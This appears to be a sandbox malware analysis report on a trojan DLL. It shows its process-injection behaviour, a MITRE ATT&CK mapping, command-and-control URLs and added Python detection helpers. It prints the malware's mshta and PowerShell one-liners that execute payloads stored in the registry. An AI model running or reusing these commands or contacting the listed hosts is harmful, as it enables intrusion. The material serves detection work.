                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000011.00000002.618351253.0000026BC911C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B55A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_00B55A14
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_00B5FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 2_2_00B5CE21
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00B5A513
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 2_2_00B5BE55

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 146.70.35.138 80
                      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: D60000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2BC0000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 73801580
                      Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 73801580
                      Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 73801580
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7500B12E0
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: D60000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: D60000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2BD0000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: D54000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2BC0000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F84004000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute read
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580 protect: page execute read
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 684 base: D60000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 684 base: 7FFA73801580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 684 base: 2BD0000 value: 80
                      Source: C:\Windows\System32\control.exe Memory written: PID: 684 base: D54000 value: 00
                      Source: C:\Windows\System32\control.exe Memory written: PID: 684 base: 7FFA73801580 value: EB
                      Source: C:\Windows\System32\control.exe Memory written: PID: 684 base: 2BC0000 value: 80
                      Source: C:\Windows\System32\control.exe Memory written: PID: 684 base: 7FFA73801580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 5304
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 684
                      Source: C:\Windows\System32\control.exe Thread register set: target process: 684
                      Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                      Source: C:\Windows\System32\control.exe Process created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_048912D3 cpuid 2_2_048912D3
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04895410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 2_2_04895410
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_048912D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 2_2_048912D3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B54DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_00B54DF5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0489515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 2_2_0489515F

                      Stealing of Sensitive Information


                      Remote Access Functionality

                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
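The Yara match sources above are easier to triage once grouped by process and memory region: the same rule hitting the same region in several snapshots is one finding, and a region dumped with an execute-and-write protection is the footprint of injected code rather than of the loaded module. The following parser is an added example for this page, not part of the Joe Sandbox report or of Joe Security's tooling. It assumes that in the dotted ".sdmp" names the first field is the process index that the report's own URL table pairs with rundll32.exe (2), powershell.exe (0x12) and control.exe (0x16), the fourth field is the region base address, and the fifth is the Win32 page protection (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE); the remaining fields are not interpreted. The sample lines are a constructed subset of the report's match list.

```python
"""Group the Yara match sources of a Joe Sandbox report by process and region.

Added example for this page; not part of the Joe Sandbox report or of Joe
Security's tooling. Field meanings of the ".sdmp" names are assumptions (see
the lead-in), not a documented format.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Process index -> process, taken from the report's own cross-references
# ("rundll32.exe, 00000002...", "Process Memory Space: rundll32.exe PID: 6768").
PROCESS_INDEX = {
    0x02: "rundll32.exe (PID 6768)",
    0x12: "powershell.exe (PID 6092)",
    0x16: "control.exe (PID 5304)",
}

PAGE_EXECUTE_READWRITE = 0x40  # assumed meaning of the fifth dotted field

LINE_RE = re.compile(r"File source:\s*(?P<ident>.+?),\s*type:\s*(?P<typ>\w+)")
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.(?P<dump>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp$"
)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<kind>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)"
    r"\.(?P<n>\d+)(?:\.raw)?\.unpack$"
)
STRINGS_RE = re.compile(r"^Process Memory Space:\s*(?P<image>\S+)\s+PID:\s*(?P<pid>\d+)$")


@dataclass(frozen=True)
class YaraHit:
    process: str
    kind: str               # MEMORY, UNPACKEDPE or MEMORYSTR, as labelled by the report
    base: Optional[int]     # region base address, when the identifier carries one
    protect: Optional[int]  # page protection, only present in .sdmp identifiers
    ident: str


def process_name(index: int) -> str:
    return PROCESS_INDEX.get(index, f"process index {index:#x}")


def parse_hit(ident: str, typ: str) -> YaraHit:
    """Turn one 'File source: <ident>, type: <typ>' pair into a YaraHit."""
    if typ == "MEMORY":
        m = SDMP_RE.match(ident)
        if not m:
            raise ValueError(f"unrecognised memory dump name: {ident}")
        return YaraHit(process_name(int(m["proc"], 16)), typ,
                       int(m["base"], 16), int(m["protect"], 16), ident)
    if typ == "UNPACKEDPE":
        m = UNPACK_RE.match(ident)
        if not m:
            raise ValueError(f"unrecognised unpacked PE name: {ident}")
        return YaraHit(process_name(int(m["proc"])), typ, int(m["base"], 16), None, ident)
    if typ == "MEMORYSTR":
        m = STRINGS_RE.match(ident)
        if not m:
            raise ValueError(f"unrecognised process strings name: {ident}")
        return YaraHit(f"{m['image']} (PID {m['pid']})", typ, None, None, ident)
    raise ValueError(f"unknown source type: {typ}")


def parse_report(text: str) -> list[YaraHit]:
    return [parse_hit(m["ident"], m["typ"]) for m in LINE_RE.finditer(text)]


def regions_by_process(hits: list[YaraHit]) -> dict[str, list[int]]:
    """Distinct region base addresses that matched, per process."""
    out: dict[str, set[int]] = defaultdict(set)
    for h in hits:
        if h.base is not None:
            out[h.process].add(h.base)
    return {p: sorted(b) for p, b in out.items()}


def rwx_regions(hits: list[YaraHit]) -> list[tuple[str, int]]:
    """Matching regions whose dump name carries PAGE_EXECUTE_READWRITE: memory
    that was written and then executed, the shape code injection leaves behind."""
    return sorted({(h.process, h.base) for h in hits
                   if h.protect == PAGE_EXECUTE_READWRITE and h.base is not None})


# Constructed subset of the match lines from the report above.
SAMPLE_LINES = """\
Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
"""

if __name__ == "__main__":
    hits = parse_report(SAMPLE_LINES)
    for proc, bases in regions_by_process(hits).items():
        print(proc, [hex(b) for b in bases])
    for proc, base in rwx_regions(hits):
        print("RWX region:", proc, hex(base))
```

On the constructed lines, the two execute-and-write regions are 0xCB0000 in control.exe and 0xB50000 in rundll32.exe; the many 0x5248000 snapshots of rundll32.exe collapse to a single region. Run the same parser over the full match list to see which regions the report's "Injects code into the Windows Explorer" signatures correspond to.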
MITRE ATT&CK Matrix

Techniques that the report mapped to at least one signature, grouped by tactic; the number in parentheses is the count shown beside the technique in the report. Techniques that carry no number in the report's matrix are omitted here.

Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (1); Native API (3); Command and Scripting Interpreter (1)
Persistence: DLL Side-Loading (1); Valid Accounts (1)
Privilege Escalation: DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (1); Process Injection (813)
Defense Evasion: Obfuscated Files or Information (1); DLL Side-Loading (1); File Deletion (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (31); Process Injection (813); Rundll32 (1)
Credential Access: none
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (25); Query Registry (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (11); Email Collection (1)
Exfiltration: none
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Network Effects: none
Remote Service Effects: none
Impact: Data Encrypted for Impact (1)
Legend (behavior graph):

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (reconstructed from the report's graph export; the numbers in parentheses are the graph's node IDs, not Windows PIDs)

Behavior Graph ID: 614013; Sample: nhLAwAo49f; Startdate: 22/04/2022; Architecture: WINDOWS; Score: 100
Signatures at the root: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures

loaddll32.exe (11)
  cmd.exe (15)
    rundll32.exe (26)
      network: 146.70.35.138, ports 49773 and 80, TENET-1ZA, United Kingdom
      signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
      control.exe (37)
        signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
        explorer.exe (44), injected
          signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Writes to foreign memory regions; 2 other signatures
          cmd.exe (49)
            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
            conhost.exe (56)
            PING.EXE (58)
          RuntimeBroker.exe (52), injected
          cmd.exe (54)
        rundll32.exe (47)
  WerFault.exe (17)
  WerFault.exe (19)
  WerFault.exe (21)
mshta.exe (13)
  powershell.exe (23)
    signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
    csc.exe (30)
      dropped: C:\Users\user\AppData\Local\...\f2vxj03f.dll (PE32)
      cvtres.exe (40)
    csc.exe (33)
      dropped: C:\Users\user\AppData\Local\...\ci1gjuu1.dll (PE32)
      cvtres.exe (42)
    conhost.exe (35)
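The behavior graph is the part of this report a detection engineer will want to turn into rules, because the parent/child relations survive repacking of the DLL: mshta.exe starting powershell.exe, powershell.exe driving csc.exe and cvtres.exe (compiling C# on the fly), and an injected explorer.exe launching cmd.exe which runs ping.exe as a sleep before the self-delete. The following is an added example for this page, not part of the Joe Sandbox report or of its signature engine. The process tree is constructed by hand from the graph's nodes and edges; the numbers are the graph's node IDs rather than Windows PIDs, and the `injected` flag copies the graph's own "injected" annotation on explorer.exe and RuntimeBroker.exe, which in production would come from a Sysmon CreateRemoteThread-style event rather than from the sandbox.

```python
"""Lineage checks over the process tree in the behavior graph above.

Added example for this page, not part of the Joe Sandbox report or its
signature engine. The tree is constructed from the graph's nodes and edges;
node IDs stand in for PIDs.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    ppid: Optional[int]
    injected: bool = False  # copies the graph's "injected" annotation


# Nodes and edges as drawn in the behavior graph (constructed from the report).
TREE = [
    Proc(11, "loaddll32.exe", None),
    Proc(13, "mshta.exe", None),
    Proc(15, "cmd.exe", 11),
    Proc(17, "WerFault.exe", 11),
    Proc(19, "WerFault.exe", 11),
    Proc(21, "WerFault.exe", 11),
    Proc(23, "powershell.exe", 13),
    Proc(26, "rundll32.exe", 15),
    Proc(30, "csc.exe", 23),
    Proc(33, "csc.exe", 23),
    Proc(35, "conhost.exe", 23),
    Proc(37, "control.exe", 26),
    Proc(40, "cvtres.exe", 30),
    Proc(42, "cvtres.exe", 33),
    Proc(44, "explorer.exe", 37, injected=True),
    Proc(47, "rundll32.exe", 37),
    Proc(49, "cmd.exe", 44),
    Proc(52, "RuntimeBroker.exe", 44, injected=True),
    Proc(54, "cmd.exe", 44),
    Proc(56, "conhost.exe", 49),
    Proc(58, "PING.EXE", 49),
]

SHELLS = {"cmd.exe", "powershell.exe"}


def find_chain(procs: list[Proc], *images: str) -> list[tuple[int, ...]]:
    """Return every chain of direct parent->child edges whose image names match
    `images` in order (case-insensitive), as a tuple of node IDs, top-down."""
    by_pid = {p.pid: p for p in procs}
    want = [i.lower() for i in images]
    found = []
    for leaf in procs:
        if leaf.image.lower() != want[-1]:
            continue
        chain = [leaf]
        cur: Optional[Proc] = leaf
        for img in reversed(want[:-1]):
            cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
            if cur is None or cur.image.lower() != img:
                break
            chain.append(cur)
        else:  # every link of the chain matched
            found.append(tuple(p.pid for p in reversed(chain)))
    return found


def injected_process_spawning_shell(procs: list[Proc]) -> list[tuple[int, int]]:
    """A process marked as injected that starts a shell: the injected code,
    not the legitimate host, is doing the work."""
    by_pid = {p.pid: p for p in procs}
    return [(p.ppid, p.pid) for p in procs
            if p.ppid in by_pid and by_pid[p.ppid].injected
            and p.image.lower() in SHELLS]


def run_checks(procs: list[Proc]) -> dict[str, list]:
    """Each entry names a behaviour the report flagged and lists the chains
    (node IDs) that exhibit it; an empty list means no match."""
    return {
        "mshta_spawns_shell": find_chain(procs, "mshta.exe", "powershell.exe")
                              + find_chain(procs, "mshta.exe", "cmd.exe"),
        "powershell_compiles_csharp": find_chain(procs, "powershell.exe", "csc.exe", "cvtres.exe"),
        "injected_process_spawns_shell": injected_process_spawning_shell(procs),
        "shell_ping_sleep": find_chain(procs, "explorer.exe", "cmd.exe", "ping.exe"),
    }


if __name__ == "__main__":
    for name, hits in run_checks(TREE).items():
        print(f"{name}: {hits or 'no match'}")
```

Against the tree above, every check fires: mshta.exe (13) to powershell.exe (23); two compile chains, (23, 30, 40) and (23, 33, 42); the injected explorer.exe (44) launching cmd.exe (49) and (54); and the (44, 49, 58) chain ending in PING.EXE. The same `find_chain` works unchanged on Sysmon Event ID 1 records once the image, PID and parent PID fields are mapped onto `Proc`.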

Screenshots: this section contains all screenshots as thumbnails, including those not shown in the slideshow (images not reproduced here).
Antivirus, Machine Learning and Genetic Malware Detection (Source / Detection / Scanner / Label)

Initial Sample:
  nhLAwAo49f.dll    29%    ReversingLabs    Win32.Trojan.Lazy
  nhLAwAo49f.dll    100%   Joe Sandbox ML

Dropped Files: No Antivirus matches

Unpacked PE Files:
  2.2.rundll32.exe.4890000.0.unpack    100%   Avira    HEUR/AGEN.1245293

Domains: No Antivirus matches

URLs:
  http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/    0%    Avira URL Cloud    safe
  http://https://file://USER.ID%lu.exe/upd    0%    Avira URL Cloud    safe
  http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZ    0%    Avira URL Cloud    safe
  http://constitution.org/usdeclar.txt    0%    URL Reputation    safe
  http://146.70.35.138/phpadmin/4B    0%    Avira URL Cloud    safe
